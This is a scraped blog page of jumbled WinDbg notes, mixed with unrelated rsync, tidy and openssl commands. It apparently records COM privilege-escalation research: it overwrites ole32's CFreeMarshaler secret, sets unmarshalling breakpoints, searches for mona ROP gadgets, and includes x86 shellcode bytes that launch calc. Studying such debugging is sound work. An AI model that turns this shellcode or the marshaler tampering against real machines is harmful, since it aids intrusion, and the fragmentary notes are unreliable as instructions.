F:\tool\dl\DeltaCopyRaw\rsync.exe -v -rlt -z --chmod=a=rw,Da+x -u --password-file=/cygdrive/ --delete "/cygdrive/F/test/" "[email protected]::wcb" <d:\rsyncd.passwd rsync --daemon --config=/etc/rsyncd.conf netstat -anpt | grep rsync F:\tool\dl\DeltaCopyRaw\rsync.exe -v -rlt -z --chmod=a=rw,Da+x -u --progress --partial --bwlimit=1000 --delete "/cygdrive/D/MyRsync/" "[email protected]::wcb" <d:\rsyncd.passwd rsync -v -rlt -z --progress --delete /mnt/HD/HD_a2/MyRsync/ [email protected]::wcb rsync -v -rlt -z --progress --delete [email protected]::wcb /volume1/HKSync {IID_IROTData} IUnknownPtr cf = nullptr; IBindCtx* bindCtx = NULL; ULONG cchEaten; CreateBindCtx(0, &bindCtx); 0xffe92680=>1d2680 HRESULT hr = _script_moniker->BindToObject(bindCtx, NULL, IID_IPersistStream, (void**)&cf); ERROR_BAD_IMPERSONATION_LEVE SecurityIdentification SECURITY_IMPERSONATION_LEVEL C:\\indows\System32\tidy.exe --doctype auto --output-html yes --clean yes --indent auto --show-warnings no --vertical-space no --tidy-mark no --wrap 0 --newline CRLF --output-bom yes --show-info yes --show-errors 0 --wrap-script-literals yes --quiet yes --force-output yes --mute-id yes --write-back yes %2 com:pipe,resets=0,reconnect,port=\\.\pipe\kd_server2008r2enterprise !process 0 0 svchost.exe .process /p /r ffffffa8032cf2b10 .reload /f /user ole32.dll .reload /f /v ole32.dll lm vm ole32; !process @$proc 0 ea0000 ?@$proc ole32base 000007fe`ff040000 000007fe`ff2122d0 =1d22d0 ------------------------------------------------ right .process /i /p fffffa8032b9d4f0; g .reload /f /user ole32.dll;lm m ole32; .process /r /p fffffa8032b9d4f0 -------------------------------------------- x63x61x63x6C, 2://.process /i; g 3://.process /r /p fffffa8032b92230 .process /p fffffa8032be2870 .process /i /p fffffa8032be2870 calc .echo rax=>: ;dc @rax L10;.echo rbx=>:;dc @rbx L10;.echo rcx=>:;dc @rcx L10;.echo rdx=>:;dc @rdx L10; dv /i /t /v dt -b this !address -summary x combase!* x ole32!*_SecretLock x qmgr!CJobExternal* dc ole32!*_SecretLock; ---------------------------------------------------------------- ~*e .if ( poi(@$teb+0x1758) == 0) { .echo Unknown } .else { .if ( poi(poi(@$teb+0x1758)+c) & 80 ) { .echo STA } .else { .echo MTA } } .load pykd !py mona rop -m mshtml.dll !py mona rop -m *.dll -cp nonull ------------right-------------------------- !py mona rop -m *.dll ------------------------------ 20180505 dt ntdll!_TEB @$teb ny *ole* dt ntdll32!_PEB @$peb x ole32!CExposedStream* bp ole32!DfUnMarshalInterface .reload /f /v ole32.dll ; lm vm ole32; bu ole32!CoCreateObjectInContext; .reload /f /v ole32.dll ; lm vm ole32; x ole32!*CPIDTable* dt ole32!CObjectContext 00000000`00277f90 first 000007fe`fdf00000 000007fe`fe0fc000 ole32 000007fe`fe0d0758 000007fe`fe0cf9c0 ole32!CPIDTable::s_PIDBuckets next 000007fe`fdf00000 000007fe`fe0fc000 ole32 000007fe`fe0cf9c0 ole32!CPIDTable::s_PIDBuckets = struct SHashChain [23] !list -t ole32!SHashChain.pNext -x "dt ole32!SHashChain poi(@$extret)" 000007fe`fdfbf9c8 !list -t ole32!SHashChain.pPrev -x "dt ole32!SHashChain poi(@$extret)" 000007fe`fdfbf9c8 !list -t ole32!SHashChain -l pNext 000007fe`fdfbf9c8 bits first 000007fe`fdf00000 000007fe`fe0fc000 ole32 000007fe`fe0cf9c0 next 000007fe`ff2c0000 000007fe`ff4bc000 ole32 000007fe`ff48f9c0 ole32!CPIDTable::s_PIDBuckets = struct SHashChain [23] ole32!CPIDTable::s_PIDBuckets偏移量?1CF9C0?固定 dps 000007fe`fdfbfa28; dps 00000000`0029fcb0; r @$t1 = 20; r @$t0 =000007fe`fdfbfa28; r @$t1 = 20; r @$t0 =ole32!CPIDTable::s_PIDBuckets; dps poi( poi(@$t0+0x008)+030h) L5;r @$t1 = @$t1-1; dt ole32!shashchain @$t0; r @$t0 = poi(@$t0+0x008)+0x008; z( @$t1);dt ole32!shashchain @$t0; r @$t1 = 20; r @$t0 =ole32!CPIDTable::s_PIDBuckets; dps @$t0 L5;r @$t1 = @$t1-1; dt ole32!shashchain @$t0; r @$t0 = poi(@$t0+0x008)+0x008; z( @$t1);dt ole32!shashchain @$t0; dps 00000000`00357f90 bp ole32!CExposedStream::Unmarshal bp ole32!GenericStream::Read dt _GUID @rsp+38h dt _GUID @rbx dt-b tagOBJREF ole32!CBasedILockBytesPtrPtr::CBasedILockBytesPtrPtr bp ole32!GenericStream::Read ---------------------------------------------------------------- eb ole32!CFreeMarshaler::_fSecretInit 01; ed ole32!CFreeMarshaler::_SecretBlock 676e6177 6c656263 73676e69 7374666f; dc ole32!CFreeMarshaler::_SecretBlock L10; dc ole32!CFreeMarshaler::_fSecretInit L10; dc @rsp+28h=>rcx x ole32!CFreeMarshaler::* x ole32!*Secret* bp /p fffffa8032be5060 kernel32!createfilew bp /p fffffa8032be5060 ole32!CFreeMarshaler::InitSecret bp /p @$proc ole32!CFreeMarshaler::UnmarshalInterface ".printf \"InItStatus:=>%d, Secret:is=>%d\", ole32!CFreeMarshaler::_fSecretInit , ole32!CFreeMarshaler::_SecretBlock;dc ole32!CFreeMarshaler::_fSecretInit ; dc ole32!CFreeMarshaler::_SecretBlock; " bp /p @$proc ole32!CStdMarshal::UnmarshalObjRef ".printf \"rbx:is=>%d\", @rbx;" bp /p ffffffa8032cf2b10 ole32!LoadTypeLibEx bp /p fffffa8032be2870 qmgr!CJobExternal::SetNotifyInterfaceInternal bp /p fffffa8032be2870 ole32!CFreeMarshaler::GetUnmarshalClass bp /p fffffa8032be2870 ole32!CStdMarshal::Finish_RemQIAndUnmarshal2 ole32!CProcessSecret::GetProcessSecret dc ole32!CFreeMarshaler::_SecretBlock bp mydriver!myFunction ".if (@eax & 0x0`ffffffff) = 0x0`c0004321 {} .else {gc}" cd G:\重要文件\nas G:\重要文件\nas\openssl\bin\openssl.exe pkcs12 -export -out server.pfx -inkey server.key -in nas.jzrj.club_ssl.crt \x31\xdb\x64\x8b\x7b\x30\x8b\x7f x0c\x8b\x7f\x1c\x8b\x47\x08\x8b x77\x20\x8b\x3f\x80\x7e\x0c\x33 x75\xf2\x89\xc7\x03\x78\x3c\x8b x57\x78\x01\xc2\x8b\x7a\x20\x01 xc7\x89\xdd\x8b\x34\xaf\x01\xc6 x45\x81\x3e\x43\x72\x65\x61\x75 xf2\x81\x7e\x08\x6f\x63\x65\x73 x75\xe9\x8b\x7a\x24\x01\xc7\x66 x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7 x8b\x7c\xaf\xfc\x01\xc7\x89\xd9 xb1\xff\x53\xe2\xfd\x68\x63\x61 x6c\x63\x89\xe2\x52\x52\x53\x53 x53\x53\x53\x53\x52\x53\xff\xd7 x ole32!CoMarshalInterface sxe ld:ole32 !process 0 0 MyComEop.exe right .process /i /p fffffa8034270770; g .reload /f /user ole32.dll;lm m ole32; .process /r /p fffffa8034270770 NdrGetUserMarshalInfo lm vm ole32;!teb; 725413A8 LoadLibraryExW API-MS-Win-Core-LibraryLoader-L1-1-0
windbg常用命令
猜你喜欢
转载自blog.csdn.net/oshuangyue12/article/details/80316885
今日推荐
周排行